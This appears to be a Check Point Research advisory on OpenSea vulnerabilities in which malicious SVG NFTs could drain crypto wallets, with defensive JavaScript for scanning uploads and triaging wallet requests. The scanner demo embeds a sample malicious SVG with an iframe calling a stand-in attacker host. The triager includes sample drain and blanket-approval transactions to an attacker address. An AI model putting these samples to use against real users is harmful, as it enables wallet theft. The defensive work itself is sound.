After seeing reports of stolen crypto wallets triggered by free airdropped NFTs, Check Point Research (CPR) investigated OpenSea, the world’s largest NFT marketplace. The investigation led to the discovery of critical security vulnerabilities on OpenSea’s platform that, if exploited, could have let hackers hijack user accounts and steal users’ entire crypto wallets by sending them malicious NFTs.
- CPR’s research findings have prevented the theft of users’ crypto wallets
- CPR chose to investigate OpenSea after observing reports of stolen crypto wallets online
- CPR proved it was possible to steal crypto wallets of users by leveraging critical security vulnerabilities found in OpenSea’s platform
- CPR immediately and responsibly disclosed its findings to OpenSea, who went on to deploy a fix within an hour of disclosure
Check Point Research (CPR) identified critical security flaws in OpenSea. Left unpatched, the vulnerabilities could allow hackers to hijack user accounts and steal entire cryptocurrency wallets by crafting malicious NFTs. OpenSea is known as the world’s largest NFT marketplace, recording US$3.4 billion in transaction volume in August 2021 alone.
Reports of Malicious Airdropped NFTs
CPR’s investigation of OpenSea was prompted by reports of free airdropped NFTs allegedly gifted to users. Curiosity led CPR to correspond with a victim of a stolen crypto wallet, who confirmed interacting with an airdropped object prior to account theft.
Exploitation Methodology
CPR identified critical security flaws in OpenSea and proved that a malicious NFT could be used to hijack accounts and steal crypto wallets. Successful exploitation of the vulnerabilities would have required the following steps:
- Hacker creates a malicious NFT and gifts it to a target victim.
- Victim views the malicious NFT, which triggers a pop-up served from OpenSea’s storage domain asking to connect the victim’s cryptocurrency wallet (the platform shows similar pop-ups for many legitimate actions, so the request does not look out of place).
- Victim clicks to connect their wallet in order to perform an action on the gifted NFT, which lets the attacker’s code address the wallet and request signatures.
- Hacker triggers a second pop-up, also served from OpenSea’s storage domain, asking the victim to sign a transaction. The pop-up does describe the transaction, but a user who approves it without reading that description hands over the funds.
- The end result could be theft of the user’s entire cryptocurrency wallet.
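The attack above hinges on an NFT whose image is an SVG carrying an iframe (the files OpenSea later shared with CPR, see Responsible Disclosure below). Inside an `<img>` tag such a file is inert, but opened as a document on the storage origin the iframe loads and any script in the file runs with that origin. The following is an added example, not OpenSea’s or CPR’s code: a scanner that rejects SVGs with active content at upload time, and a set of response headers for a user-content origin that neutralise a file that still gets through. The headers are an assumption about how such a file can be served safely, not a description of OpenSea’s actual fix; both SVGs are constructed for the demo.

```javascript
// Added example (not OpenSea's or CPR's code). An NFT "image" that is really an SVG
// with an <iframe> in it is harmless inside an <img> tag, but if the file is opened
// as a document on the storage origin the iframe loads and any script runs there.
// scanSvg() rejects such files at upload time; storageHeaders() shows response headers
// (an assumption about a fix, not OpenSea's actual one) that neutralise a file that
// still gets through. Both SVGs below are constructed for this demo.

const MALICIOUS_SVG = `<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400">
  <rect width="400" height="400" fill="#eee"/>
  <text x="20" y="40">Free airdrop!</text>
  <foreignObject x="0" y="0" width="400" height="400">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://attacker.example/drain.html"></iframe>
  </foreignObject>
</svg>`;

const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="gold"/>
</svg>`;

// Elements that embed another document or run code when the SVG is rendered as a page.
const ACTIVE_ELEMENTS = new Set(['script', 'iframe', 'foreignobject', 'embed', 'object']);
// Attributes that carry a URL the renderer will follow.
const URL_ATTRIBUTES = new Set(['href', 'xlink:href', 'src', 'data']);

const TAG_RE = /<([a-zA-Z][\w:.-]*)([^>]*)>/g;
const ATTR_RE = /([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

function isDangerousUrl(value) {
  const v = value.trim().toLowerCase();
  return v.startsWith('javascript:') || v.startsWith('data:') ||
         v.startsWith('//') || /^[a-z][a-z0-9+.-]*:\/\//.test(v);
}

// Returns { safe, findings } where findings are strings such as
// 'element:iframe', 'handler:onload', 'url:src=https://...'.
// A regex tokenizer is enough for a demo; a production filter should walk a real
// XML DOM and fail closed on anything it cannot parse.
function scanSvg(svgText) {
  const findings = new Set();
  for (const tag of svgText.matchAll(TAG_RE)) {
    const name = tag[1].toLowerCase();
    if (ACTIVE_ELEMENTS.has(name)) findings.add(`element:${name}`);
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      const attrName = attr[1].toLowerCase();
      const value = attr[2] ?? attr[3] ?? attr[4] ?? '';
      if (attrName.startsWith('on')) findings.add(`handler:${attrName}`);
      if (URL_ATTRIBUTES.has(attrName) && isDangerousUrl(value)) findings.add(`url:${attrName}=${value}`);
    }
  }
  return { safe: findings.size === 0, findings: [...findings] };
}

// Headers for a user-content origin so that a direct navigation to an SVG cannot
// script or frame anything: CSP 'sandbox' gives the document an opaque origin with
// scripts off, default-src 'none' blocks nested frames and external loads, and
// Content-Disposition turns a direct visit into a download while the file still
// renders as an <img> subresource.
function storageHeaders() {
  return {
    'Content-Type': 'image/svg+xml',
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "sandbox; default-src 'none'; style-src 'unsafe-inline'",
    'Content-Disposition': 'attachment',
  };
}

for (const [label, svg] of [['malicious', MALICIOUS_SVG], ['benign', BENIGN_SVG]]) {
  const result = scanSvg(svg);
  console.log(`${label}: ${result.safe ? 'accept' : 'reject'} ${result.findings.join(' ')}`);
}
```

The scanner deliberately errs on the side of rejection: `foreignObject` is flagged on its own, because it is the element that lets HTML (and therefore an iframe) live inside an SVG at all, and any `on*` attribute or `javascript:`/external URL is reported regardless of the element it sits on.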
Responsible Disclosure
CPR immediately and responsibly disclosed its findings to OpenSea on Sunday, September 26, 2021. OpenSea fixed the issue and verified the fix within an hour of disclosure. CPR worked closely with the OpenSea team to confirm the fix was effective: OpenSea shared SVG files containing iframe objects served from its storage domain so that both teams could review them together and make sure every attack vector was closed.
How to Protect Yourself
CPR recommends care whenever a website asks you to connect your wallet or sign a request. Before approving, read exactly what is being requested (which method, which address, what value or permission) and ask whether it matches the action you started and whether anything about it is abnormal or suspicious. If in doubt, reject the request and investigate before granting any authorization.
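The review CPR recommends can be made concrete. The following added example (not OpenSea’s or CPR’s code, and not the logic of any real wallet) triages the JSON-RPC requests a web page can send through a browser wallet provider, distinguishing a wallet connection from a value transfer, a blanket token approval, or a raw `eth_sign`. The addresses, sample requests and risk thresholds are constructed for the demo; the page does not say which of these methods the attack used. The two 4-byte selectors are those of the standard ERC-721/1155 `setApprovalForAll(address,bool)` and ERC-20 `approve(address,uint256)` functions.

```javascript
// Added example (not OpenSea's or CPR's code): triage of wallet requests of the kind
// a page can fire through window.ethereum, the way a careful user (or a wallet's
// warning logic) should reason before clicking "Sign". All addresses are made up.

const USER = '0x1111111111111111111111111111111111111111';
const NFT_CONTRACT = '0x2222222222222222222222222222222222222222';
const ATTACKER = '0x000000000000000000000000000000000000dead';

// 4-byte selectors of the two approval calls a drainer most wants you to sign.
const SEL_SET_APPROVAL_FOR_ALL = '0xa22cb465'; // setApprovalForAll(address,bool)  ERC-721/1155
const SEL_APPROVE = '0x095ea7b3';              // approve(address,uint256)         ERC-20

// ABI-encode setApprovalForAll(operator, approved) so the sample request is realistic.
function encodeSetApprovalForAll(operator, approved) {
  const addr = operator.toLowerCase().slice(2).padStart(64, '0');
  const flag = (approved ? '1' : '0').padStart(64, '0');
  return SEL_SET_APPROVAL_FOR_ALL + addr + flag;
}

// Returns { risk: 'low' | 'review' | 'high', reasons: string[] }.
// known: Set of lower-case addresses the user deliberately chose to deal with.
function assessRequest(req, known) {
  const high = [];
  const review = [];
  const isKnown = (a) => Boolean(a) && known.has(a.toLowerCase());

  switch (req.method) {
    case 'eth_requestAccounts':
    case 'wallet_requestPermissions':
      review.push('connects the wallet: no funds move yet, but every later request starts here; only accept for an action you initiated');
      break;
    case 'eth_sign':
      high.push('eth_sign signs an arbitrary 32-byte hash, which can be a transaction; legitimate dapps do not need it');
      break;
    case 'personal_sign':
    case 'eth_signTypedData_v4':
      review.push('off-chain signature: read the message, marketplace listings and permits are authorised this way');
      break;
    case 'eth_sendTransaction': {
      const tx = req.params[0] || {};
      const value = tx.value ? BigInt(tx.value) : 0n;
      const data = (tx.data || '0x').toLowerCase();
      if (value > 0n) {
        (isKnown(tx.to) ? review : high).push(`sends ${value} wei to ${tx.to}`);
      }
      if (data.startsWith(SEL_SET_APPROVAL_FOR_ALL)) {
        const operator = '0x' + data.slice(34, 74);      // 20-byte operator, right-aligned in word 1
        const approved = data.slice(74).endsWith('1');   // bool in word 2
        if (approved && !isKnown(operator)) high.push(`setApprovalForAll grants ${operator} the right to move every token you hold in ${tx.to}`);
      } else if (data.startsWith(SEL_APPROVE)) {
        const spender = '0x' + data.slice(34, 74);
        if (!isKnown(spender)) high.push(`approve lets ${spender} spend your ERC-20 balance in ${tx.to}`);
      } else if (!isKnown(tx.to)) {
        review.push(`interacts with ${tx.to}, which you have not dealt with before`);
      }
      break;
    }
    default:
      review.push(`unfamiliar method ${req.method}`);
  }
  const risk = high.length ? 'high' : review.length ? 'review' : 'low';
  return { risk, reasons: [...high, ...review] };
}

// Constructed sample requests, in the order the attack above would send them.
const KNOWN = new Set([NFT_CONTRACT]);
const SAMPLE_REQUESTS = {
  connect: { method: 'eth_requestAccounts', params: [] },
  drain: { method: 'eth_sendTransaction', params: [{ from: USER, to: ATTACKER, value: '0xde0b6b3a7640000' }] }, // 1 ETH
  approveAll: { method: 'eth_sendTransaction', params: [{ from: USER, to: NFT_CONTRACT, data: encodeSetApprovalForAll(ATTACKER, true) }] },
  rawSign: { method: 'eth_sign', params: [USER, '0x' + 'ab'.repeat(32)] },
  ownAction: { method: 'eth_sendTransaction', params: [{ from: USER, to: NFT_CONTRACT, value: '0x0', data: '0x' }] },
};

for (const [name, req] of Object.entries(SAMPLE_REQUESTS)) {
  const { risk, reasons } = assessRequest(req, KNOWN);
  console.log(`${name}: ${risk}${reasons.length ? ' - ' + reasons.join('; ') : ''}`);
}
```

The point of the `known` set is the one CPR makes: a request is suspicious relative to what you set out to do. Connecting a wallet to look at a gifted NFT is already a request you did not initiate, and a value transfer or `setApprovalForAll` to an address you have never dealt with, arriving in a pop-up you did not ask for, is exactly the second step of the attack described above.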
Quote: Oded Vanunu, Head of Products Vulnerabilities Research at Check Point Software:
“Our interest in OpenSea was sparked when we saw chatter of stolen crypto wallets online. We speculated that an attack method existed in the wild around OpenSea, so we initiated a thorough investigation of OpenSea’s platform. The result was the discovery of a way to steal crypto wallets of users, simply by sending a malicious NFT through OpenSea. We immediately and responsibly disclosed our findings to OpenSea, who quickly worked with us to deploy a fix. I believe that our research findings, and the quick action by OpenSea, will prevent thefts of crypto wallets of users. Blockchain innovation is fast underway and NFTs are here to stay. Given the sheer pace of innovation, there is an inherent challenge in securely integrating software applications and crypto markets. Bad actors know they have an open window right now to take advantage of, with consumer adoption spiking, while security measures in this space still need to catch up. The cyber security community must step up to help pioneering blockchain technologies secure crypto assets of consumers. We sternly warn the OpenSea community to watch out for suspicious activity that may lead to theft, as we believe bad actors will continue to expand their efforts, in order to hijack crypto wallets while exploiting system vulnerabilities.”
Statement from OpenSea:
“Security is fundamental to OpenSea. We appreciate the CPR team bringing this vulnerability to our attention and collaborating with us as we investigated the matter and implemented a fix within an hour of it being brought to our attention. These attacks would have relied on users approving malicious activity through a third-party wallet provider by connecting their wallet and providing a signature for the malicious transaction. We have been unable to identify any instances where this vulnerability was exploited but are coordinating directly with third-party wallets that integrate with our platform on how to help users better identify malicious signature requests, as well as other initiatives to help users thwart scams and phishing attacks with greater efficacy. We are also doubling down on community education around security best practices and have kicked off a blog series on how to stay safe on the decentralized web. We encourage new users and seasoned veterans alike to give the series a read. Our goal is to empower the community to detect, mitigate and report attacks in the blockchain ecosystem, such as the one demonstrated by CPR.”